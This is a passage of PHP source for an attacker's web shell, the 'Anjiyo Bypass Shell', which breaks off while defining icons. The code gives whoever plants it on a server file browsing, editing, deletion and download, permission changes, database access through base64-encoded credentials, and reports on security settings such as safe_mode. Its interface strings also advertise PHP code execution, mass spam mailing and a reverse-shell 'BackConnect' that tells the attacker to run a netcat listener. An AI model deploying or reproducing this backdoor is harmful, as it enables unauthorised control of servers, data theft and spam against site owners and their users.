FHMAWE

1. /* Decoded by 1337 Brain For Abdou Abi */
2.  
3. <?php set_time_limit(0);
4. error_reporting(0);
5. @session_start();
6. language('esp');
7. if (isset($_GET['hostm']) &&isset($_GET['userm']))
8. {
9. $hostm = base64_decode($_GET['hostm']);
10. $userm = base64_decode($_GET['userm']);
11. $passm = base64_decode($_GET['passm']);
12. }
13. function hex2bin($str)
14. {
15. $bin = '';
16. $i = 0;
17. while ($i <strlen($str))
18. {
19. $bin .= chr(hexdec($str{$i}.$str{($i +1)}));
20. $i += 2;
21. }
22. return $bin;
23. }
24. function language($lang)
25. {
26. global $lenguaje;
27. if ($lang=='esp')
28. {
29. $lenguaje = array(0 =>'ON (Güvenli)',1 =>'OFF (Güvenlikler kapalý)',2 =>'Yok',3 =>'Dosya',4 =>'Tipi',5 =>'Dosya boyutu',6 =>'Chmod izinleri',7 =>'Ýþlemler',8 =>'Enlace',9 =>'Crear Carpeta',10 =>'Crear Archivo',11 =>'Klasör',12 =>'Arþiv',13 =>'Sil',14 =>'Descargar',15 =>'Editar',16 =>'No se puede abrir el directorio,  lo siento.',17 =>'Onayla',18 =>'Ejecutar!',19 =>'Kullanýcý:',20 =>'Þifre',21 =>'Entrar!',22 =>'List Tablas',23 =>'Borrar',24 =>'Descargar',25 =>'Volver atras',26 =>'Datos',27 =>'Lo siento,  no se pueden listar las tablas de la db seleccionada.',28 =>'Entrar!',29 =>'Campo',30 =>'Tipo',31 =>'Nulo',32 =>'Llave',33 =>'Por defecto',34 =>'Extra',35 =>'La tabla seleccionada,  no tiene registros.',36 =>'La base de datos fue borrada correctamente.',37 =>'No se pudo borrar la base de datos.',38 =>'Realmente deseas borrar la db',39 =>'Si',40 =>'La tabla fue borrada correctamente.',41 =>'No se pudo borrar la tabla.',42 =>'Realmente deseas borrar la tabla',43 =>'Tu email',44 =>'Lista de emails',45 =>'Titulo',46 =>'Contenido HTML',47 =>'Conectando',48 =>'Si no tienes habilitados los iframes,  has clic ',49 =>'aqui',50 =>'Conectar',51 =>'( Debes ejecutar en tu pc: <b>nc -lnvp 1337</b>,  y tener el puerto abierto :) )',52 =>'Server ip',53 =>'Kendi ipin',54 =>'SI',55 =>'NO',56 =>'Disable Functions',57 =>'Iniciox',58 =>'Codigo PHP',59 =>'Conexion Reversa',60 =>'Dosyayý düzenleyebilirsiniz',61 =>'Archivo Guardado Correctamente!',62 =>'Lo siento,  no se ha podido guardar el archivo.',63 =>'Php kodunu enjekte et',64 =>'Error subiendo archivo',65 =>'No se puede copiar ',66 =>'al dir',67 =>'Archivo Subido correctamente',68 =>'Carpeta Borrada',69 =>'Archivo Borrado',70 =>'Carpeta Creada',71 =>'Nombre de la carpeta',72 =>'Crear DIR!',73 =>'Archivo Creado',74 =>'Nombre del archivo',75 =>'Crear Archivo!',76 =>'Lo siento,  no se puede descargar el archivo',77 =>'Volver Atras',78 =>'Logueado correctamente',79 =>'Listar DBS',80 =>'Salir',81 =>'Login Incorrecto.',82 =>'Spammeado correctamente',83 =>'No fue spammeado',84 =>'Subir Archivos',85 =>'Utilidades',86 =>'Estas seguro que deseas borrar los siguientes archivos/carpetas?',87 =>'Estas seguro que deseas borrar el siguiente archivo:',88 =>'Estas seguro que deseas borrar la siguiente carpeta:',89 =>'Lo siento, no se pueden leer los permisos',90 =>'CHMOD Cambiado',91 =>'Error al cambiar el CHMOD',92 =>'Caracter Inv&aacute;lido',93 =>'Yeni permisyon',94 =>'Nuevos permisos',95 =>'Üzgünüm seçtiðin dosya deðil',96 =>'Hatalý link');
30. }
31. else
32. {
33. $lenguaje = array(0 =>'ON (Secure)',1 =>'OFF (Not Secure)',2 =>'Havent',3 =>'Name',4 =>'Type',5 =>'Size',6 =>'Perms',7 =>'Options',8 =>'Link',9 =>'Make folder',10 =>'Make file',11 =>'Folder',12 =>'File',13 =>'Delete',14 =>'Download',15 =>'Edit',16 =>'Unable to open the directory,  sorry.',17 =>'Send',18 =>'RUN!',19 =>'User:',20 =>'Password:',21 =>'Login!',22 =>'List Tables',23 =>'Deñete',24 =>'Download',25 =>'Go back',26 =>'Data',27 =>'Lo siento,  no se pueden listar las tablas de la db seleccionada.',28 =>'Login!',29 =>'Campo',30 =>'Type',31 =>'Null',32 =>'Key',33 =>'Default',34 =>'Extra',35 =>'The selected table has no records.',36 =>'The database was deleted successfully.',37 =>'Could not delete the database.',38 =>'I really want to delete the database',39 =>'Yes',40 =>'The table was deleted successfully.',41 =>'Could not delete the table.',42 =>'I really want to clear the table',43 =>'Your email',44 =>'MailList',45 =>'Title',46 =>'Content HTML',47 =>'Connecting',48 =>'If you do not have iframes enabled,  you click',49 =>'HERE',50 =>'Connect',51 =>'( You run on your pc: <b>nc -lnvp 1337</b>,  and have the port open :) )',52 =>'IP of server',53 =>'Your IP',54 =>'ON',55 =>'OFF',56 =>'Disabled Functions',57 =>'Index',58 =>'PHP RUN',59 =>'BackConnect',60 =>'If the type of function used to visualize the file does not work,  you try to open the file with',61 =>'File saved successfully!',62 =>'Sorry,  could not save the file.',63 =>'Running PHP code (not write the php tags!)',64 =>'Error uploading file',65 =>'Cant copy',66 =>'in the directory',67 =>'File saved successfully',68 =>'Folder deleted',69 =>'File Deleted',70 =>'Folder Maked',71 =>'Name folder',72 =>'Make Dir!',73 =>'File created',74 =>'Name file',75 =>'Make File!',76 =>'Sorry, you cant download the file',77 =>'Go back',78 =>'Logged correctly',79 =>'List databases',80 =>'Exit',81 =>'Login Incorrect.',82 =>'Spammed correctly',83 =>'Was not spammed',84 =>'Upload Files',85 =>'Utilities',86 =>'Are you sure you want to delete the following files / folders ?',87 =>'Are you sure you want to delete the following file:',88 =>'Are you sure you want to delete the following folder:',89 =>'Sorry, can not be read permissions',90 =>'CHMOD changed',91 =>'Failed to change the CHMOD',92 =>'Invalid Character',93 =>'Current Permits',94 =>'New Permits',95 =>'I\'m sorry, you did not select files',96 =>'Invalid link');
34. }
35. }
36. function css()
37. {
38. echo '<style>
39. body{
40.    font-family: "Verdana", cursive;
41.    background-color: #00bf5f;
42.    text-shadow:0px 0px 1px #757575;
43. }
44. #content tr:hover{
45.    background-color: #636263;
46.    text-shadow:0px 0px 10px #fff;
47. }
48. #content .first{
49.    background-color: silver;
50. }
51. #content .first:hover{
52.    background-color: silver;
53.    text-shadow:0px 0px 1px #757575;
54. }
55. table{
56.    border: 0px #dbdbdb;
57. }
58. H1{
59.    font-family: "Rye", cursive;
60. }
61. a{
62.    color: #FF0000;
63.    text-decoration: none;
64. }
65. a:hover{
66.    color: #fff;
67.    text-shadow:0px 0px 10px #ffffff;
68. }
69. input,select,textarea{
70.    border: 1px #000000 solid;
71.    -moz-border-radius: 5px;
72.    -webkit-border-radius:5px;
73.    border-radius:5px;
74. }
75. </style> ';
76. }
77. function header_index()
78. {
79. global $lenguaje;
80. echo '<title>'.$_SERVER['HTTP_HOST'].' - Anjiyo.php Bypass Shell v 1 // Coded by MecTruy</title><div align="center">
81.      <span class="Logo"><img src="http://sellukaweb.com/logoz.png"><br><font color="white"><b>Anjiyo Bypass Shell</b></font></span><br /><br />
82.      <table style="Border-Collapse: collapse" cellSpacing="0" borderColorDark="#666666" cellPadding="0" width="100%" bgColor="#4a494a" borderColorLight="#c0c0c0" border="3">
83.      <tr valign="top">
84.      <td><b>System</b>: <font color="red">'.php_uname().'</font><br/>
85.      <b>Soft</b>: <font color="red">'.$_SERVER['SERVER_SOFTWARE'].'</font> | <a href="?id=phpinfo">PHPINFO</a><br />
86.      <b>Safe-Mode</b>: ';
87. if (strtolower(ini_get('safe_mode')) or ini_get('safe_mode') == 'on')
88. {
89. echo '<font color=red>'.$lenguaje[0].'</font>';
90. }
91. else
92. {
93. echo '<font color=green>'.$lenguaje[1].'</font>';
94. }
95. echo '<br />
96. <b>Open base dir</b>: ';
97. if (strtolower(ini_get('open_basedir')) or ini_get('open_basedir') == 'on')
98. {
99. echo '<font color=red>'.ini_get('open_basedir').'</font>';
100. }
101. else
102. {
103. echo '<font color=green>'.$lenguaje[1].'</font>';
104. }
105. echo '<br />';
106. exp_dirs();
107. echo '</td>
108.      </tr>
109.      </table><br />';
110. }
111. function ver_tam($tam)
112. {
113. if (!is_numeric($tam))
114. {
115. return FALSE;
116. }
117. else
118. {
119. if ($tam >= 1073741824)
120. {
121. $tam = round($tam/1073741824*100)/100 .' GB';
122. }
123. elseif ($tam >= 1048576)
124. {
125. $tam = round($tam/1048576*100)/100 .' MB';
126. }
127. elseif ($tam >= 1024)
128. {
129. $tam = round($tam/1024*100)/100 .' KB';
130. }
131. else
132. {
133. $tam = $tam .' B';
134. }
135. return $tam;
136. }
137. }
138. function disable_functions()
139. {
140. global $lenguaje;
141. if ($disablefunc=ini_get('disable_functions'))
142. {
143. return '<font color=#FF9900><b>'.$disablefunc.'</b></font>';
144. }
145. else
146. {
147. return '<font color=#00FF00><b>'.$lenguaje[2].'</b></font>';
148. }
149. }
150. function buffer_exec($buffer)
151. {
152. global $Sonuç;
153. $Sonuç = htmlspecialchars(ob_get_contents());
154. }
155. function exp_dirs()
156. {
157. global $dir;
158. if (trim($dir)=='')
159. {
160. $dir = @getcwd();
161. }
162. elseif(!trim($dir)=='')
163. {
164. $dir = @realpath($dir);
165. }
166. if (substr($dir,-1) != DIRECTORY_SEPARATOR)
167. {
168. $dir .= DIRECTORY_SEPARATOR;
169. }
170. $pd = $e = explode(DIRECTORY_SEPARATOR,substr($dir,0,-1));
171. $i = 0;
172. echo '<b>Dir</b>: ';
173. foreach($pd as $b)
174. {
175. $t = '';
176. $j = 0;
177. foreach ($e as $r)
178. {
179. $t.= $r.DIRECTORY_SEPARATOR;
180. if ($j == $i)
181. {
182. break;
183. }
184. $j++;
185. }
186. echo '<a href="?id=dir&d='.urlencode($t).'"><b>'.htmlspecialchars($b).DIRECTORY_SEPARATOR.'</b></a>';
187. $i++;
188. }
189. }
190. function ver_permisos($modo)
191. {
192. if (($modo &0xC000) === 0xC000)
193. {
194. $tipo = 's';
195. }
196. elseif (($modo &0x4000) === 0x4000)
197. {
198. $tipo = 'd';
199. }
200. elseif (($modo &0xA000) === 0xA000)
201. {
202. $tipo = 'l';
203. }
204. elseif (($modo &0x8000) === 0x8000)
205. {
206. $tipo = '-';
207. }
208. elseif (($modo &0x6000) === 0x6000)
209. {
210. $tipo = 'b';
211. }
212. elseif (($modo &0x2000) === 0x2000)
213. {
214. $tipo = 'c';
215. }
216. elseif (($modo &0x1000) === 0x1000)
217. {
218. $tipo = 'p';
219. }
220. else {$tipo = '?';}
221. $prop['read'] = ($modo &00400)?'r':'-';
222. $prop['write'] = ($modo &00200)?'w':'-';
223. $prop['execute'] = ($modo &00100)?'x':'-';
224. $group['read'] = ($modo &00040)?'r':'-';
225. $group['write'] = ($modo &00020)?'w':'-';
226. $group['execute'] = ($modo &00010)?'x':'-';
227. $world['read'] = ($modo &00004)?'r':'-';
228. $world['write'] = ($modo &00002)?'w':'-';
229. $world['execute'] = ($modo &00001)?'x':'-';
230. return $tipo.join($prop).join($group).join($world);
231. }
232. function ver_permisos_color($file_color)
233. {
234. global $dir;
235. if (!is_readable($file_color))
236. {
237. return '<a href="?id=pwn_chmod&pwnd='.$file_color.'&d='.$dir.'" style="color: red;">'.ver_permisos(fileperms($file_color)).'</a>';
238. }
239. elseif (!is_writable($file_color))
240. {
241. return '<a href="?id=pwn_chmod&pwnd='.$file_color.'&d='.$dir.'" style="color: white;">'.ver_permisos(fileperms($file_color)).'</a>';
242. }
243. else
244. {
245. return '<a href="?id=pwn_chmod&pwnd='.$file_color.'&d='.$dir.'" style="color: green;">'.ver_permisos(fileperms($file_color)).'</a>';
246. }
247. }
248. function listar_archivos($dir)
249. {
250. global $lenguaje;
251. if ($dh=@dir($dir))
252. {
253. while ($file = $dh->read())
254. {
255. if (($file=='.') or ($file=='..'))
256. {
257. $links_ls[]=$file;
258. }
259. elseif (is_dir($dir.'/'.$file))
260. {
261. $dirs_ls[]=$file;
262. }
263. else
264. {
265. $archivos_ls[]=$file;
266. }
267. }
268. echo '<form action="?id=checkbox_form&d='.$dir.'" method="post">
269.             <input type="hidden" name="dir" value="'.$dir.'">
270.             <table style="Border-Collapse: collapse" cellSpacing=0 borderColor=#5a5a5a cellPadding=1 width="100%" bgColor=#f6f2f2 borderColorLight=#5a5a5a border=1 valign="middle">
271.             <tr>
272.             <td align="center"><b>-</b></td>
273.             <td><b>'.$lenguaje[3].'</b></td>
274.             <td><b>'.$lenguaje[4].'</b></td>
275.             <td><b>'.$lenguaje[5].'</b></td>
276.             <td><b>'.$lenguaje[6].'</b></td>
277.             <td><b>'.$lenguaje[7].'</b></td>
278.             <td width="16" align="left">OP</td>
279.             </tr>';
280. $color=0;
281. if(isset($links_ls))
282. {
283. foreach ($links_ls as $links)
284. {
285. if ($links=='..')
286. {
287. echo '<tr ';
288. if (!$color)
289. {
290. echo 'bgcolor="#333333"';
291. $color=1;
292. }
293. else
294. {
295. $color=0;
296. }
297. echo '>
298.                      <td width="16" align="center"><img src="?id=icono&tipo=link"></td>
299.                      <td><a href="?id=dir&d='.realpath($dir.'/..').'">'.$links.'</a></td>
300.                      <td>'.$lenguaje[8].'</td>
301.                      <td>---</td>
302.                      <td>'.ver_permisos_color(realpath($dir.'/..')).'</td>
303.                      <td>---</td>
304.                      <td>--</td>
305.                      </tr>';
306. }
307. elseif ($links=='.')
308. {
309. echo '<tr ';
310. if (!$color)
311. {
312. echo 'bgcolor="#333333"';
313. $color_nm='#333333';
314. $color=1;
315. }
316. else
317. {
318. $color_nm='#2f2f2f';
319. $color=0;
320. }
321. echo '>
322.                      <td width="16" align="center"><img src="?id=icono&tipo=carpeta"></td>
323.                      <td><a href="?id=dir&d='.realpath($dir.'/.').'">'.$links.'</a></td>
324.                      <td>'.$lenguaje[8].'</td>
325.                      <td>---</td>
326.                      <td>'.ver_permisos_color(realpath($dir.'/.')).'</td>
327.                      <td><a href="?id=mkdir&d='.realpath($dir.'/').'" style="border:none; color:'.$color_nm.';"><img src="?id=icono&tipo=agregar_carpeta"></a><a href="?id=mkfile&d='.realpath($dir.'/').'" style="border:none; color:'.$color_nm.';"><img src="?id=icono&tipo=agregar_archivo"></a></td>
328.                      <td>--</td>
329.                      </tr>';
330. }
331. }
332. }
333. if(isset($dirs_ls))
334. {
335. asort($dirs_ls);
336. foreach ($dirs_ls as $dirs)
337. {
338. echo '<tr ';
339. if (!$color)
340. {
341. echo 'bgcolor="#d6d6d6"';
342. $color_nm='#333333';
343. $color=1;
344. }
345. else
346. {
347. $color_nm='#2f2f2f';
348. $color=0;
349. }
350. echo '>
351.                      <td width="16" align="center"><img src="?id=icono&tipo=carpeta"></td>
352.                      <td><a href="?id=dir&d='.realpath($dir.'/'.$dirs).'">'.$dirs.'</a></td>
353.                      <td>'.$lenguaje[11].'</td>
354.                      <td>---</td>
355.                      <td>'.ver_permisos_color(realpath($dir.'/'.$dirs)).'</td>
356.                      <td><a href="?id=rmdir&d1r='.realpath($dir.'/'.$dirs).'&d='.realpath($dir.'/').'" style="border:none; color:'.$color_nm.';"><img src="?id=icono&tipo=borrar"></a></td>
357.                      <td><input type="checkbox" name="directorios[]" value="'.$dirs.'"></td>
358.                      </tr>';
359. }
360. }
361. if(isset($archivos_ls))
362. {
363. asort($archivos_ls);
364. foreach ($archivos_ls as $archivo)
365. {
366. echo '<tr ';
367. if (!$color)
368. {
369. echo 'bgcolor="#d6d6d6"';
370. $color_nm='#333333';
371. $color=1;
372. }
373. else
374. {
375. $color_nm='#2f2f2f';
376. $color=0;
377. }
378. echo ' valign="top" height="5">
379.                      <td width="16" align="center"><img src="?id=icono&tipo=archivo"></td>
380.                      <td><a href="?id=a_edit&d='.realpath($dir.'/').'&a='.$archivo.'&w=ZnJlYWQ=">'.$archivo.'</a></td>
381.                      <td>'.$lenguaje[12].'</td>
382.                      <td>'.ver_tam(filesize(realpath($dir.'/'.$archivo))).'</td>
383.                      <td>'.ver_permisos_color(realpath($dir.'/'.$archivo)).'</td>
384.                      <td>
385.                      <a href="?id=rm_file&fil3='.realpath($dir.'/'.$archivo).'&d='.realpath($dir.'/').'" style="border:none; color:'.$color_nm.';"><img src="?id=icono&tipo=borrar"></a>
386.                      <a href="?id=fdown&fil3_down='.$archivo.'&fil3_path='.realpath($dir.'/'.$archivo).'&d='.realpath($dir.'/').'" style="border:none; color:'.$color_nm.';"><img src="?id=icono&tipo=descargar"></a>  
387.                      <a href="?id=a_edit&d='.realpath($dir.'/').'&a='.$archivo.'&w=ZnJlYWQ=" style="border:none; color:'.$color_nm.';"><img src="?id=icono&tipo=editar"></a></td>
388.                      <td><input type="checkbox" name="archivos[]" value="'.$archivo.'"></td>
389.                      </tr>';
390. }
391. }
392. echo '</table>';
393. echo '<div align="right"><br />
394.             <input type="submit" value="OK" />
395.             <select name="menu_dirs" style="border:none; color:#F00; font-size:12px">
396.             <option value="borrar">'.$lenguaje[13].'</option>
397.             </select>
398.             </div>
399.             </form>';
400. }
401. else
402. {
403. echo $lenguaje[16];
404. }
405. }
406. function mostrar_iconos($icono)
407. {
408. if ($icono=='carpeta')
409. {
410. $mostrar_icono='R0lGODlhEAAQAPcAAP//////zP//mf//Zv//M///AP/M///MzP/Mmf/MZv/MM//MAP+Z//+ZzP+Zmf+ZZv+ZM/+ZAP9m//9mzP9mmf9mZv9mM/9mAP8z//8zzP8zmf8zZv8zM/8zAP8A//8AzP8Amf8AZv8AM/8AAMz//8z/zMz/mcz/Zsz/M8z/AMzM/8zMzMzMmczMZszMM8zMAMyZ/8yZzMyZmcyZZsyZM8yZAMxm/8xmzMxmmcxmZsxmM8xmAMwz/8wzzMwzmcwzZswzM8wzAMwA/8wAzMwAmcwAZswAM8wAAJn//5n/zJn/mZn/Zpn/M5n/AJnM/5nMzJnMmZnMZpnMM5nMAJmZ/5mZzJmZmZmZZpmZM5mZAJlm/5lmzJlmmZlmZplmM5lmAJkz/5kzzJkzmZkzZpkzM5kzAJkA/5kAzJkAmZkAZpkAM5kAAGb//2b/zGb/mWb/Zmb/M2b/AGbM/2bMzGbMmWbMZmbMM2bMAGaZ/2aZzGaZmWaZZmaZM2aZAGZm/2ZmzGZmmWZmZmZmM2ZmAGYz/2YzzGYzmWYzZmYzM2YzAGYA/2YAzGYAmWYAZmYAM2YAADP//zP/zDP/mTP/ZjP/MzP/ADPM/zPMzDPMmTPMZjPMMzPMADOZ/zOZzDOZmTOZZjOZMzOZADNm/zNmzDNmmTNmZjNmMzNmADMz/zMzzDMzmTMzZjMzMzMzADMA/zMAzDMAmTMAZjMAMzMAAAD//wD/zAD/mQD/ZgD/MwD/AADM/wDMzADMmQDMZgDMMwDMAACZ/wCZzACZmQCZZgCZMwCZAABm/wBmzABmmQBmZgBmMwBmAAAz/wAzzAAzmQAzZgAzMwAzAAAA/wAAzAAAmQAAZgAAMwAAAP//lP//nP//9//3jP/3nP/3pf/vhP/ne//nhL2eMbWOGN62Of/fe5x5GN62Qt62Sv/Xa6V5EOe+UvfXhP/PYwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACwAAAAAEAAQAAAIhgCvCRxIsKDBgwbDKQyHcGA4ABC1MUT4MJvFbADEadSYziG3bSBBQhzZUWA4b+A2qlx5LRw5cQC0yZQ5cp02ceXCoRN3MVu3nuyy4QzHjie2o0ixbVMnNGfRbOCiSgXn7Vy3oU+/ad36jZy5pkR5ohtLduw4bjivrVy7sZzAcnDjyo3bEGFAADs=';
411. }
412. elseif ($icono=='link')
413. {
414. $mostrar_icono='iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAABmJLR0QA/wD/AP+gvaeTAAAACXBIWXMAAABIAAAASABGyWs+AAACOklEQVQ4y8VTS2gTYRCe+XezzbbNsylNmqDFxkZjoF6Mj0SQGhNQUIqgHuoDDxU8exBFBKleRL1IwYMXUUEPHooUBKNSFJvQUqvGEIU0jzZ1NzHpI41Juru/hxqMxZMVnOPMfN83zMyHlFJYS5A1of8FAbs6IUkSpFMpXTyZMkuyrDIZDfkue6eo0eqk+r7PsZieMIz8G4EgCPzd+499b2KCr8oZ2pBRMVBeKJrVlcjRgGd4n68nynEc/RSNtp2/fO3EyWO9w1hb4mwm03jp+uCpJNr8equdJYQoP2tYXlrEpdT7vH9LyyN3t/PDnSev+tPz0sZzh7dfQUopLC9XYeDG4JHXQkOfulmPUrmosLyW8FoDEEQKAJQCkELi4/eyODXX4tpjKYmJ4tm9nQMsAEAoPNbxMpI50MTzM25LNbh+k1mMxdMd775EPWy7q53X6AEpVQwdLjVd57QwrIqWBAoAiKyiyPD0+YiXrSzMXTxz6JZn184EEgKyLI2Mj0+8uP1gqO9btWtHk9FMEACQEAp1v0NEMdsYDo1uON3b89Dr9SSQrFyWYVhwu7dNH9zdPVSYmlz847shAJtMJltNzQ2Z/QHfxOr629GQ7d6zseOtTo+OEPJLmBAAXBFis9msOhDwTxqNxmo9OBwKmS9cvdmvWLY6+MLXaiU/W1NFRAbKhYyEaKcYDAYtVqu15HA45usJIpGIKTU9Y2NVHK2dE2tzAwAiVVzOzXHM5XKMRqNROI77K1fhf3fjD83C6LLhE0Y7AAAAInpUWHRTb2Z0d2FyZQAAeNorLy/Xy8zLLk5OLEjVyy9KBwA22AZYEFPKXAAAAABJRU5ErkJggg==';
415. }
416. elseif ($icono=='archivo')
417. {
418. $mostrar_icono='R0lGODlhEAAQAPcAAP//////zP//mf//Zv//M///AP/M///MzP/Mmf/MZv/MM//MAP+Z//+ZzP+Zmf+ZZv+ZM/+ZAP9m//9mzP9mmf9mZv9mM/9mAP8z//8zzP8zmf8zZv8zM/8zAP8A//8AzP8Amf8AZv8AM/8AAMz//8z/zMz/mcz/Zsz/M8z/AMzM/8zMzMzMmczMZszMM8zMAMyZ/8yZzMyZmcyZZsyZM8yZAMxm/8xmzMxmmcxmZsxmM8xmAMwz/8wzzMwzmcwzZswzM8wzAMwA/8wAzMwAmcwAZswAM8wAAJn//5n/zJn/mZn/Zpn/M5n/AJnM/5nMzJnMmZnMZpnMM5nMAJmZ/5mZzJmZmZmZZpmZM5mZAJlm/5lmzJlmmZlmZplmM5lmAJkz/5kzzJkzmZkzZpkzM5kzAJkA/5kAzJkAmZkAZpkAM5kAAGb//2b/zGb/mWb/Zmb/M2b/AGbM/2bMzGbMmWbMZmbMM2bMAGaZ/2aZzGaZmWaZZmaZM2aZAGZm/2ZmzGZmmWZmZmZmM2ZmAGYz/2YzzGYzmWYzZmYzM2YzAGYA/2YAzGYAmWYAZmYAM2YAADP//zP/zDP/mTP/ZjP/MzP/ADPM/zPMzDPMmTPMZjPMMzPMADOZ/zOZzDOZmTOZZjOZMzOZADNm/zNmzDNmmTNmZjNmMzNmADMz/zMzzDMzmTMzZjMzMzMzADMA/zMAzDMAmTMAZjMAMzMAAAD//wD/zAD/mQD/ZgD/MwD/AADM/wDMzADMmQDMZgDMMwDMAACZ/wCZzACZmQCZZgCZMwCZAABm/wBmzABmmQBmZgBmMwBmAAAz/wAzzAAzmQAzZgAzMwAzAAAA/wAAzAAAmQAAZgAAMwAAAFJRUgAAnACGAJyenISGhM7Pzufn1v/PMYQAAAgICAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACwAAAAAEAAQAAAIfACvcRtIsOC2awgRcvPGsGHDbdgSCgRAsWLFbQAiKrTIESI2jdwAFBwZrhtIkdm+ZVvJMlzGjdxYyszm8mRIjgC81YQJoAA4itJy7pwYEtwIANJoSdP5kijFnwC0aWNq06HDoSHDad3KtelNnBZBdhtLtuxYjR/Tql17LSAAOw==';
419. }
420. elseif ($icono=='borrar')
421. {
422. $mostrar_icono='iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAXUlEQVR42u2SwQoAIAhD88vVLy8KBlaS0i1oJwP3piGVg0Skmpq8HjqZrWl9uwCbGAmwKYGZs/6iqgMyAdJuM8W2QmYKpLt/0AG9ASCv/oAnANd3AEjmAlFT1BypAV+PnRH5YehvAAAAAElFTkSuQmCC';
423. }
424. elseif ($icono=='editar')
425. {
426. $mostrar_icono='iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAABmJLR0QA/wD/AP+gvaeTAAAACXBIWXMAAAsSAAALEgHS3X78AAAAB3RJTUUH1gkCDTgyeDqBQAAAAB10RVh0Q29tbWVudABDcmVhdGVkIHdpdGggVGhlIEdJTVDvZCVuAAABp0lEQVQ4y42RvUtbURjGfzfECI0U6eIQFNLFrRCHLkIrWAX/gYLk+oWDQ7OUQkgQ2qEEw8X+AaUgxNh2KIpLQLSCBEHQ4pAttEvNFM29mXJRDpy3Q416c68fD5zhvIf39z7vcwyuNZy3cvvcr7FMevGnr5q3cqK19h2llCilxHVdUUpJ3spJ3sq9aveFOkGO42DbNnbDptFo4DQdfh0dsbVdon5a593bNMBOG+IDiAgigkbQIogW4k/jNJtNoo+i1E/rmMkZgB2AsA+ghZXCF09t2pyjJ/qYjc0fuK5Lq9W6evMBtGhmpuYBgUsXWjSJxBAnJ3+JRCL0fH4JwLiJGQ5aoVBcufULxiuLDGag+/cLKuvlYiBgKjmLICD/722dZfuvmi8Oy9ySgab4rXDn5IvDMtUaAO8DMhCSk9OeWufkag3+9I3y+tPux3DQnl+/r3qn420eWFhl+6AG7BqBgJsOzrL9DK3BG3XOfBf0pko8eT4BB0vBGXQ6yKzBsQm9qQ90xZ55wgbkXgedebRlGEawg1gsxkOktfYB9qzlpREeqFAotAfwD53h3AFtQ/QoAAAAAElFTkSuQmCC';
427. }
428. elseif ($icono=='descargar')
429. {
430. $mostrar_icono='iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAABGdBTUEAANkE3LLaAgAAAoFJREFUeJx1kstL1FEYhp9zzsw45VxSs5Fuk8NITldqMCWKIDCQiogW0UKoDCKCWrUOoj+gVYsocNGiRWBEi6A2CQXahJV2WdSgdNGiJh3NnzO/c2mhjZL2rc7ifR/e872fYIlJH01f3X9sf6ee0VMCgQqryOO7j2/l7+Wv/KsNLAVINTZmujpOrdeeDwJUOMhwLt+UJ79IuyRg2vzSH6cGMZ7BAQGtmBbjZimtWvCWbeeyNzP70scbdsR2xxpCcc+N4zHOpCkw7Sbiq1NrW+q31x38nBt9ALhFCULN5fa9h7PrjO9RcB8IBiUAvnaksisbk7tk45MHuZG/5kWATi8z3P+qt97f4sLxQIyIWIF1mh+M8b00SmSw2jtd3vPpGe8Xf+FEe/Ptg61Nh6rfI/WMJyKp1axZniYarAXrk+iTtLxLy6aGug2ZVCL1qO9DTwVw+dKZqx3ZVR0DAy9qvn7+JnhTxo0Itmw+QKxUz5cbz7G9RX4WCvLr6BfasptSieTWxNP+1w8DAL8nJ5sS1SI1EqlhWbQWJSR+0THWk8M5qJuKUJWO4pxFOkNUlKLC2UxlB8boeFAb9rVuxvkeQkhAYLSPEALZkATncA4sIEtFgk7GKgCrjRZYVm5s5VH3NRz2n7YFAF7ZcqTrIt9z95kpq1IF4CQ+QoKqAhViZ3brAnOlMQZeDEEoPJfEzgOEFT5qtnNjDK8GhnAVo6gAjJk9RhkIYayeBxhEGTl7EkoptjUnsdYgpcLaOZNSvHw7AoDWGmdZkEBILQWApf3kBf437S0OEKhQECtMqZIvHCZ59vjh60gZcDgnhQQxF93N78ACdfFIdaFQLHbfuX9+osTwHy4bB5h5T+YrAAAAAElFTkSuQmCC';
431. }
432. elseif ($icono=='agregar_archivo')
433. {
434. $mostrar_icono='iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAAWdJREFUeNqkUz1rg1AUvUr3jIEKmkxdav6Bq4hDELpkz/7GLP4Dx/wJs9ShlKBZ8xe6dMpWUggkEMSE+NF3hGfV2rS0Fy7vvofn3HOu70lFUdB/4qbr0PO8a6wPs9ks+JZAgC3LotFo1EX+yBdJ7OU2GEARSZJQHMd0PB7pcDh0ypHbYN71WZxlWdZIxGQywTLnOUQhYYhtz4qivOu63tc0jfI8L8FYF4sFLZdLMgzjzXVdBQ2rGdSl8+gPBgNK07RSAgKA7+b3tGbrW5yHYfhJgIHBKz5EXi6XCuj7PkVR1PDOGxZQ0vgLAlCXjQQYnUWIGko6CergXq9HpmnSiq0q8Ct7KWsokNsE8C2mjnq/39N0OqUgCBoWuH8Jg2wQtMFYz+czbbdbOp1OZNt22R2dxeB/tCByt9sRY4wcxyFVVXEbh1zF5qoFkSCAAgTuAg/Gc/PlLeDf//U1jvltfPolZlzffAgwAMubE3kVfrHwAAAAAElFTkSuQmCC';
435. }
436. elseif ($icono=='agregar_carpeta')
437. {
